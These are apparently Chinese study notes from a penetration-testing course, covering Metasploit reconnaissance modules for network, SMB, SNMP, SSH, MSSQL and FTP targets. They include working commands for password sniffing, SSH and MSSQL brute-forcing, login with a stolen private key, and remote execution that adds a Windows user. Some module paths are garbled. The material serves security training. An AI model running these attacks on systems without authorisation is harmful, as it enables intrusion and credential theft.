MSF(三):信息收集
MSF(三):信息收集
安全牛學(xué)習(xí)Metasploit Framework筆記
1、Nmap掃描開啟了哪些服務(wù)
db_nmap -sV 192.168. 1.0/24
2、Auxiliary掃描模塊使用時,指定RHOSTS或RHOST
192.168.1.20-192.168.1.30或192.168.1.1-30或192.168.1.0/24, 192.168.11.0/24, 192.168.100.141或file:/root/h.txt
3、arp掃描
use auxiliary/scanner/discovery/arp_sweep
4、端口掃描
use auxiliary/scanner/portscan/syn
5、Nmap IPID ldle掃描
查找ipidseq主機,通俗來講就是尋找ipid是遞增的主機
- use auxiliary/scanner/ip/ipidseq
- set RHOSTS 192. 168.1.0/24
- run
- 找到之后使用namp進(jìn)行idle掃描
nmap -PN -sI 1.1.1.2 1.1.1.3
6、UDP掃描模塊
use auxiliary/scanner/discovery/udp_sweep
use auxiliary/scanner/discovery/udp_probe
7、密碼嗅探
使用模塊:use auxiliary/sniffer/psnuffle
抓取kali向外發(fā)送的請求中的賬號和密碼
支持從pcap抓包文件中提取密碼
功能類似于dsniff,目前只支持pop3、imap、ftp、HTTP GET協(xié)議
8、SNMP掃描(udp端口)
(1)先修改為開放狀態(tài):vi /etc/default/snmpd
(2)偵聽地址修改為0.0.0.0或其它非127.0.0.1的IP
(3)重啟服務(wù):cd /etc/init.d/snmpd restart
(4)nmap -p161 -sU x.x.x.x,會顯示open
9、SMB系列掃描
- use auxiliary/scanner/smb/smb_version
SMB版本掃描 - use auxiliary/scanner/smb/pipe_auditor
掃描命名管道,判斷SMB服務(wù)類型(賬號、密碼) - use auxiliary/scanner/smb/pipe_dcerpc_auditor
掃描通過SMB管道可以訪問的RCERPC服務(wù) - use auxiliary/scanner/smb/smb_enumshares
SMB共享枚舉(賬號、密碼) - use auxiliary/scanner/smb/smb_enumusers
SMB用戶枚舉(賬號、密碼) - use auxiliary/scanner/smb/smb_lookupsid
這個snmp和smb差不多的功能,由實驗可知smb枚舉的更詳細(xì),完整
10、SSH系列掃描
- SSH版本掃描
use auxiliary/scanner/ssh/ssh_version - SSH密碼爆破
use auxiliary/scanner/ssh/ssh_login
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
set VERBOSE true
run - SSH公鑰登陸(id_rsa是通過其它方法竊取到的)
use auxiliary/scanner/ssh/ssh login_pubkey
set KEY_FILE id_rsa ; set USERNAME root ; run
11、檢查目標(biāo)Windows缺少的補丁
前提:基于已經(jīng)取得的session進(jìn)行檢測
利用模塊:
use post/windows/gather/enum_patches
show advanced
set VERBOSE yes
如果檢查失敗出現(xiàn):Known bug in WMI query, try migrating to another process
可以遷移到另一個進(jìn)程再次嘗試,建議migrate spoolsv.exe的PID(或者explorer.exe,總之遷移到有system權(quán)限的進(jìn)程內(nèi))
12、Mssql掃描端口
- 如果發(fā)現(xiàn)機器上開放著1434,可以基本確定開放了myssql服務(wù)
TCP 1433(動態(tài)端口) / UDP 1434 (查詢TCP端口號),根據(jù)UDP 1434查看TCP端口
use auxiliary/scanner/mssql/mssql_ping - 爆破mssq|密碼
use auxiliary/scanner/mssq|/mssql_login - 知道密碼后,連接數(shù)據(jù)庫端口,然后遠(yuǎn)程執(zhí)行系統(tǒng)命令
use auxiliary/admin/mssql/mssql_exec
set CMD net user user pass /add
13、FTP系列利用模塊
- use auxiliary/scanner/ftp/ftp_version
- use auxiliary/scanner/ftp/anonymous
- use auxiliry/scanentpttp_login
總結(jié)
以上是生活随笔為你收集整理的MSF(三):信息收集的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: MSF(二):msf外部/内部常用命令
- 下一篇: 卢克西2件与3件有什么区别 卢克&